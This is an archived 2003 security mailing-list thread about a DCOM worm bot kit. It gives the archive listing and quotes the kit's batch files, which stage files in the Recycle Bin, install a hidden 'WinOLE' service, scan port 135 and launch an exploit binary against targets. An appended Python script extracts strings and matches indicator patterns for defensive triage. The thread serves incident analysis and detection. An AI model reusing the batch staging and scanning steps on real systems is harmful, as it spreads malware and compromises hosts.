RE: DCOM bot.rar
From: Schmehl, Paul L (pauls_at_utdallas.edu)
Date: 08/19/03
- Previous message: Jonathan A. Zdziarski: "SoBig.F (Was: document_all.pif)"
- Maybe in reply to: Andrej: "DCOM bot.rar"
- Next in thread: Steffen Kluge: "Re: DCOM bot.rar"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Tue, 19 Aug 2003 16:10:42 -0500
To: <laj@swordlord.com>, <incidents@securityfocus.com>
Typical warez site stuff. Looks like the warez kiddies are using the
worms to create new file repositories. Did you run strings on any of
the files?
Paul Schmehl (pauls@utdallas.edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/~pauls/
> -----Original Message-----
> From: Andrej [mailto:laj@swordlord.com]
> Sent: Tuesday, August 19, 2003 4:22 AM
> To: incidents@securityfocus.com
> Subject: DCOM bot.rar
>
>
> I was finally able to get bot.rar...
> Here is the archive list:
> Archive bot.rar
>
> Name                Size   Packed  Ratio  Date      Time   Attr    CRC       Meth  Ver
> --------------------------------------------------------------------------------------
> winole.exe        572928   566724    98%  22-07-03  18:47  .....A  6E1BA67C  m3e   2.9
> wmpx.exe           43383    35139    80%  07-08-03  02:01  .....A  0A73E7CB  m3e   2.9
> wx11.bat             109      109   100%  06-08-03  18:29  .....A  BA641709  m0e   2.9
> wx12.bat             194      166    85%  07-08-03  03:28  .....A  66A7E567  m3e   2.9
> wx12.exe           19618    10055    51%  06-08-03  20:55  .....A  273D03A0  m3e   2.9
> logs                   0        0     0%  07-08-03  14:22  .D....  00000000  m0    2.0
> unrar.bat            169      137    81%  06-08-03  18:22  .....A  4E276E39  m3e   2.9
> UnRAR.exe         194048    87237    44%  16-06-03  18:32  ......  B638F78C  m3e   2.9
> bnc.cfg               76       75    98%  27-07-03  16:48  .....A  03CDF0A3  m3e   2.9
> Clear.exe          28672    11962    41%  16-06-03  18:32  .....A  FBA086F4  m3e   2.9
> click.exe          32768     6149    18%  16-06-03  18:32  .....A  EA3874C5  m3e   2.9
> CRC.EXE            24096     8231    34%  16-06-03  21:41  .....A  D2158CA5  m3e   2.9
> cygwin1.dll       971080   375803    38%  17-06-03  03:06  .....A  7337F48A  m3e   2.9
> deploy.bat           274      185    67%  06-08-03  18:20  .....A  A3DA5EC6  m3e   2.9
> dhcpp.exe          69632    28908    41%  16-06-03  18:32  .....A  2CA5E915  m3e   2.9
> drvx.dll            2853     1215    42%  06-08-03  21:03  .....A  5956B0F0  m3e   2.9
> events.exe        134656    37316    27%  22-07-03  17:58  .....A  0EF30C5D  m3e   2.9
> jesus.dll           4254     1275    29%  07-08-03  01:21  .....A  BFF39F13  m3e   2.9
> LucomServer.dll      802      484    60%  06-08-03  18:00  .....A  4C649F72  m3e   2.9
> msoft.dll            206      128    62%  24-07-03  00:13  .....A  8DF17003  m3e   2.9
> nctl.exe          569344   542111    95%  26-07-03  21:12  .....A  F0C7F7AA  m3e   2.9
> pslist.exe         49152    21746    44%  16-06-03  21:41  .....A  ED211211  m3e   2.9
> Q019204.EXE        21584    10136    46%  16-06-03  21:41  .....A  212BBC50  m3e   2.9
> reg.reg              773      432    55%  04-08-03  14:23  .....A  6FE50066  m3e   2.9
> service.exe        63488    26461    41%  01-07-03  10:40  .....A  78DBBEF8  m3e   2.9
> service.txt          176      129    73%  06-08-03  18:02  .....A  E63DBB36  m3e   2.9
> SFind.exe         266752   263546    98%  07-08-03  02:04  .....A  76BB24D4  m3e   2.9
> start.dll           6153     1745    28%  07-08-03  14:22  .....A  303AF0E8  m3e   2.9
> users.dll          75017    23205    30%  07-08-03  01:22  .....A  EE2F60B1  m3e   2.9
> --------------------------------------------------------------------------------------
>                       29  3152257  2060809    65%
>
>
> the .bat files are below:
> ::::::::::::::
> deploy.bat
> ::::::::::::::
> REM Stage the kit under the Recycle Bin SID directory, copy the archive into
> REM logs\, then (re)install the "WinOLE" service and import reg.reg.
> cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004
> mkdir "logs"
> copy bot.rar c:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\LOGS\
> net stop WinOLE
> service.exe -r WinOLE
> service.exe service.txt
> %SYSTEMROOT%\regedit.exe -S reg.reg
> net start WinOLE
> exit
> ::::::::::::::
> unrar.bat
> ::::::::::::::
> REM Clear the read-only bits, unpack the archive in place, hand off to deploy.bat.
> cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
>
> attrib -r bot.rar
> attrib -r unrar.exe
> attrib -r unrar.bat
>
> unrar.exe x bot.rar
> start deploy.bat
> EXIT
> ::::::::::::::
> wx11.bat
> ::::::::::::::
> REM Scan the targets given as %1 %2 for TCP port 135 (the RPC endpoint mapper
> REM DCOM listens on); an empty RPC.dll exists for the duration of the scan.
> cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
> ECHO. > RPC.dll
> sfind -p 135 %1 %2
> del RPC.dll
> ::::::::::::::
> wx12.bat
> ::::::::::::::
> REM Ping %2 once; if it replies, run wx12.exe against it twice (first argument
> REM 1, then 0, with %1 passed through). rpcf.dll exists while this runs.
> cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
> ECHO. > rpcf.dll
> ping -n 1 %2 | find "Reply"
> if errorlevel 1 goto end
> wx12.exe 1 %2 %1
> wx12.exe 0 %2 %1
> :end
> del rpcf.dll
> exit
>
>
> ---------------------------------------------------------------------------
> Captus Networks - Integrated Intrusion Prevention and Traffic Shaping
> - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans
> - Automatically Control P2P, IM and Spam Traffic
> - Ensure Reliable Performance of Mission Critical Applications
> - Precisely Define and Implement Network Security and Performance Policies
> **FREE Vulnerability Assessment Toolkit - WhitePapers - Live Demo
> Visit us at:
> http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814
> ----------------------------------------------------------------------------
>
>
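Paul's suggestion to run strings over the dropped files, carried out as a small triage script. This is an added example, not code from the thread or from the bot kit itself. It hashes every file in a drop directory, pulls printable ASCII and UTF-16LE runs the way `strings` does (the UTF-16 pass catches what the default `strings` misses in Windows binaries), and flags runs that match indicators visible in the quoted batch files: the RECYCLER SID path, the WinOLE service name, the port-135 sweep, and IRC/bouncer vocabulary. The indicator labels and patterns are my own assumptions, and the entries in SAMPLE_FILES are constructed byte blobs standing in for the real archive members, not their actual contents.

```python
"""Triage a directory of dropped files: hash each one, extract strings,
flag indicator matches. Added example for the bot.rar thread; the indicator
patterns and the sample blobs are assumptions, not data from the real kit."""
import hashlib
import re
import sys
from pathlib import Path
from typing import Dict, List

MIN_LEN = 6  # shortest printable run reported, like `strings -n 6`

# Indicators lifted from the quoted batch files plus generic IRC-bot vocabulary.
# Labels are this example's own; tune them to the kit you are looking at.
IOC_PATTERNS = {
    "recycler-drop": re.compile(r"RECYCLER\\S-1-5-21-\d+-\d+-\d+-\d+", re.I),
    "winole-service": re.compile(r"\bWinOLE\b", re.I),
    "rpc-135-scan": re.compile(r"\bsfind\b|-p\s*135\b|\brpcf?\.dll\b", re.I),
    "irc-control": re.compile(r"\b(?:PRIVMSG|NICK|JOIN|USER|NOTICE)\b"),
    "bouncer": re.compile(r"\bbnc\.cfg\b|\bpsybnc\b", re.I),
}


def extract_strings(data: bytes, min_len: int = MIN_LEN) -> List[str]:
    """Printable runs in file order: ASCII, plus UTF-16LE runs that
    `strings` skips by default but Windows binaries are full of."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [(m.start(), m.group().decode("ascii")) for m in ascii_re.finditer(data)]
    found += [(m.start(), m.group().decode("utf-16-le")) for m in wide_re.finditer(data)]
    found.sort()
    return [s for _, s in found]


def find_iocs(strings: List[str]) -> Dict[str, List[str]]:
    """Map indicator label -> the strings that matched it ({} if nothing hit)."""
    hits: Dict[str, List[str]] = {}
    for s in strings:
        for label, pat in IOC_PATTERNS.items():
            if pat.search(s):
                hits.setdefault(label, []).append(s)
    return hits


def triage_bytes(name: str, data: bytes) -> dict:
    """Per-file record: size, SHA-256, extracted strings, indicator hits."""
    strings = extract_strings(data)
    return {
        "name": name,
        "size": len(data),
        "sha256": hashlib.sha256(data).hexdigest(),
        "strings": strings,
        "iocs": find_iocs(strings),
    }


def triage_dir(path: Path) -> List[dict]:
    """Triage every regular file directly under `path`, in name order."""
    return [triage_bytes(p.name, p.read_bytes()) for p in sorted(path.iterdir()) if p.is_file()]


def summarize(reports: List[dict]) -> List[str]:
    """One line per file: hash prefix, size, name, indicator labels hit ('-' if none)."""
    return [
        f"{r['sha256'][:16]}  {r['size']:>8}  {r['name']:<16} {','.join(sorted(r['iocs'])) or '-'}"
        for r in reports
    ]


# Constructed stand-ins for three archive members (assumed contents, not the real bytes).
SAMPLE_FILES = {
    "wx11.bat": (b"cd C:\\RECYCLER\\S-1-5-21-57989841-1715567821-725345543-1004\\\r\n"
                 b"ECHO. > RPC.dll\r\nsfind -p 135 %1 %2\r\ndel RPC.dll\r\n"),
    "winole.exe": (b"MZ\x90\x00" + b"\x00\x01\x02\xff\xfe" * 40  # non-printable filler
                   + b"NICK %s\r\nJOIN #%s\r\n" + b"\x00" * 8
                   + "WinOLE Service".encode("utf-16-le") + b"\x00\x00"
                   + b"bnc.cfg\x00" + b"PRIVMSG "),
    "bnc.cfg": b"PORT 6667\nPASS change_me\n",
}

if __name__ == "__main__":
    # With a directory argument, triage real files; otherwise run over the samples.
    reports = triage_dir(Path(sys.argv[1])) if len(sys.argv) > 1 else [
        triage_bytes(n, d) for n, d in SAMPLE_FILES.items()]
    print("\n".join(summarize(reports)))
```

A hit list is a starting point for the question in the thread, not a verdict: a file with no hits is only clean against these patterns, and a RAR ratio near 100% in the listing above (winole.exe, nctl.exe, SFind.exe) is a hint that the binary is already packed, so strings on it will show little until it is unpacked.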